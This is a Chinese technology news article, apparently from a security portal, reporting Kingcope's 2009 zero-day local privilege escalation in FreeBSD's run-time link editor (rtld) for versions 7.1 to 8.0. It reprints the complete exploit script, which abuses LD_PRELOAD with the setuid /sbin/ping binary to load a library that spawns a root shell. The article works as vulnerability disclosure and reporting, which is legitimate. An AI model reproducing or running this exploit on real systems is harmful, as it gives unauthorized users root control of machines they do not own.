FreeBSD爆严重安全漏洞 安全专家称疑是圣诞前的礼物

安全
在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞......

在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

相关脚本如下:

#!/bin/sh

echo “FreeBSD local r00t zeroday by Kingcope on November 2009″

cat > env.c << _EOF

#include

main() {

extern char **environ;

environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);

environ[1] = (char*)malloc(1024);

strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

execl(”/sbin/ping”, “ping”, 0);

}

_EOF

gcc env.c -o env > /dev/null 2>&1

#download from baoz.net

cat > program.c << _EOF

#include

#include

#include

#include

void _init() {

extern char **environ;

environ=NULL;

system(”echo ALEX-ALEX;/bin/sh”);

}

_EOF

gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。

【编辑推荐】

  1. 补丁未出 各FreeBSD工程师可暂用临时方法应急(附代码)
  2. FreeBSD 6.x特权提升漏洞
  3. FreeBSD爆Root权限提升漏洞
  4. FreeBSD安全连接方式SSL
责任编辑:赵宁宁 来源: cnbeta
相关推荐

2010-07-13 21:23:32

软件安全安全漏洞

2011-08-30 16:11:03

2014-11-04 10:23:14

2010-06-08 21:14:35

2009-09-30 11:10:31

2021-03-27 09:47:02

漏洞安全Cisco Jabbe

2015-08-26 10:14:29

2017-12-19 10:15:14

2023-08-14 19:51:43

2024-07-16 14:03:56

2012-12-21 17:11:22

2023-07-29 11:15:47

2021-06-21 05:19:43

Peloton Bik安全漏洞

2020-07-27 19:23:03

安全漏洞数据

2012-11-07 13:23:35

2012-06-08 10:32:33

2014-04-09 10:27:29

2023-03-09 07:56:08

2013-10-28 11:13:47

2009-04-24 11:03:40

点赞
收藏

51CTO技术栈公众号